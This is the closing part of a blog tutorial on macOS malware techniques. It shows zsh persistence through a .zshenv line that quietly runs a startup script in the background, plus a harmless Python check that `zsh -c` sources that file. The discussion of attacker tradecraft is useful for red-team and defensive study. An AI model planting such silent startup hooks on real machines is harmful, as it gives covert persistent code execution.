Let's talk about bash profiles, which you may know from Linux
systems. They're essentially scripts containing commands that run
whenever you open up a terminal. Instead of bash profiles, zsh has
its own version called startup files, which serve the same purpose.
But here's the twist: zsh also comes with an extra file, the zsh
environment file (.zshenv). This file is more powerful because it is
sourced more often, ensuring persistence across different
interactions with zsh.

The cool thing is that even if you just run a one-off command with
zsh -c, this shell environment file still gets sourced. This means
your persistence setup remains strong, no matter how you're using the
shell.

~ > cat .zshenv
. "/Users/foo/startup.sh" > /dev/null 2>&1&

Now, every time you open a terminal and Z shell initializes, it will
automatically execute the startup.sh script, ensuring that your
desired commands or actions are performed consistently.
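
You can check the claim that zsh -c still sources .zshenv without
touching your real dotfiles. The sketch below points ZDOTDIR (the
variable zsh uses to locate its startup files) at a throwaway
directory, drops a harmless .zshenv there, and runs a non-interactive
zsh -c. The helper name and the DEMO_MARKER variable are made up for
the demo; if zsh isn't installed the helper returns None.

```python
import os
import shutil
import subprocess
import tempfile


def zshenv_is_sourced():
    """Return True if `zsh -c` sourced .zshenv, or None when zsh is missing."""
    zsh = shutil.which("zsh")
    if zsh is None:
        return None
    with tempfile.TemporaryDirectory() as zdotdir:
        # A harmless .zshenv that only sets a marker variable.
        with open(os.path.join(zdotdir, ".zshenv"), "w") as fh:
            fh.write("DEMO_MARKER=sourced\n")
        # ZDOTDIR makes zsh read its startup files from our temp directory.
        env = dict(os.environ, ZDOTDIR=zdotdir)
        result = subprocess.run(
            [zsh, "-c", "print -r -- $DEMO_MARKER"],
            env=env,
            capture_output=True,
            text=True,
            check=True,
        )
        return result.stdout.strip() == "sourced"


if __name__ == "__main__":
    print(zshenv_is_sourced())
```

The shell here is neither a login shell nor interactive, so the
marker can only come from .zshenv, which is exactly why that file is
the attractive one.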

[IMG7]

Now, to execute it quietly in the background, we use setopt
NO_MONITOR. This option disables job monitoring, so zsh doesn't print
job-control messages when startup.sh is launched in the background.
As a result, the script runs every time you open a terminal with Z
shell, but it runs silently in the background.

So, you get the gist of it, right? These are some of the known
techniques I've come across, especially in samples. There are more,
like cron jobs, Dock shortcuts, and others. But to be honest, if I
were to write specifically for macOS, I'd go multi-stage and avoid
any known techniques out there. Simply put, once a technique is made
public, it's burned. So I'd focus more on developing something that
has a longer lifespan.

Nowadays, with all the public scripts and post-exploitation
frameworks out there, attackers try to get the job done easily
without wasting time or energy. Writing malware takes both, so they
aim for low-hanging fruit that's just good enough, because once the
malware is burned, it's burned. A long-term operation is different:
it takes time and skill to put together, and you can't risk the
malware getting burned by the first few infections. For a red team
exercise, on the other hand, you'd test the low-hanging fruit and an
easy way in before emulating advanced threats.

Also, a skilled attacker can get past most security setups with just
a simple MSFvenom shellcode. Yep, in the end, it comes down to the
simplest attacks. Usually, at this point in an article, I'd add a
section on writing a simple piece of malware, where we take all that
we've covered and put it into one sample (a rootkit). However, after
some thought, adding more code might just make things drag on and get
confusing. We can save that for another article where we can really
dive into the whole process, because rootkits are quite advanced
pieces of code and require knowledge of the kernel and low-level
system programming. Since we only scratched the surface here, I don't
think a rootkit would be a good fit for this article; it needs its
own.

But hey, since we've already covered code injection pretty
extensively, we'll get into the fancy stuff later.

Conclusion

In conclusion, I hope that you've enjoyed and learned something from
this article. We've covered a broad array of topics related to the
macOS architecture and API, although we've only scratched the
surface. By delving into techniques and writing simple code using the
Mach API, we've gained a deeper understanding of the environment, its
features, and its security. We've covered fundamental concepts like
code injection and simple persistence techniques, and we've even seen
macOS syscalls in action through examples. Until next time.

References

  * I/O Kit Fundamentals
  * macOS - Apple Developer
  * Code Injection on macOS
  * Simple Code Injection
  * Writing 64-bit Assembly on Mac OS X
  * Architecture of the Kernel - Darwin

Written on March 9th, 2024 by 0xf00